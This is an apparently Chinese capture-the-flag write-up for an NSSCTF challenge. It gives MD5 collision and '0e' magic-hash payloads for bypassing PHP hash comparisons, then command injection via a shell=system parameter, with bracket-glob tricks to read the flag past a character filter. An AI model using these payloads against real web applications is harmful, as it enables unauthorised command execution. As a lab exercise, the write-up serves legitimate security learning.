[NSSCTF Round#16 Basic]RCE但是没有完全RCE

RCE但是没有完全RCE wp

题目代码：

第一关

第一个 md5 强比较，使用 payload ：

md5_1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&md5_2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

第二个 MD5 加密后弱比较等于自身，使用 payload：

# POST 传参
md5_3=0e215962017

返回结果：

提示：3z_RC3.php

第二关

访问 3z_RC3.php ：

温馨提示：linux 中可以使用 dir 命令代替 ls 来查看当前目录下的所有文件。

因此 POST 传参 shell=system ，同时 GET 传参 cmd=dir / ，即可查看根目录下所有文件。返回结果：

因为字母 a，l 被过滤了，所以 cat ，tac，head，tail，less 命令都用不了，但是 more 命令可以用。

flag 每个字母都被过滤了，* 和 ? 也用不了，可以用 [] 来匹配单个字符，如 [a-z] 匹配的是 a-z 之间的某个字符。

中括号正则匹配是根据ASCII码值来分辨先后顺序的。

因此 GET 传参

cmd=more /[b-z][b-z][^-b][b-z]

返回结果：